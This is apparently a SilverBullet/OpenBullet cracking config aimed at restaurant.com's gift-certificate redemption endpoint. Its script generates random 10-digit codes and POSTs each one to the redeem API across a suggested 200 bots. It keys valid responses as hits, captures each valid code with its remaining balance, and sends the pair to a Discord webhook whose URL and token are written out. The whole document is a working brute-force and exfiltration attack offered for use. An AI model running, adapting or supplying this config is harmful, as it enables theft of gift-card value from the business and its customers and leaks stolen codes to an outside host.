[SETTINGS]
{
  "Name": "restaurant.com",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2021-11-16T14:06:03.420785+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "restaurant",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION RandomString "1?d?d?d?d?d?d?d?d?d" -> VAR "c" 

REQUEST POST "https://www.restaurant.com/theidealmeal/redemption/redeem" AutoRedirect=FALSE 
  CONTENT "Code=<c>&HasRedeemedCode=true&Location=99101&Keyword=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.restaurant.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-CA,en-US;q=0.7,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://www.restaurant.com/theidealmeal/Redemption/redeemcertificate?redirect=&message=2" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Content-Length: 60" 
  HEADER "Origin: https://www.restaurant.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Pragma: no-cache" 
  HEADER "Cache-Control: no-cache" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "RemainingBalance\":0" 
  KEYCHAIN Success AND 
    KEY "ResponseCode\":\"Valid" 

PARSE "<c>" LR "" "" CreateEmpty=FALSE -> CAP "Card Number" 

PARSE "<SOURCE>" JSON "RemainingBalance" CreateEmpty=FALSE -> CAP "Balance" "$" "" 

REQUEST POST "https://discord.com/api/webhooks/895285004245041154/QgIjEa3-eQn_U4-f8oOple67_rzAmvB08jiP3jrNf7W2_qUu65LCFYUyYQ4ChxVg33zs" 
  CONTENT "{\"content\":\">>> ```\\\\n<c> <Balance>```\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Retry OR 
    KEY "You are being rate limited" 

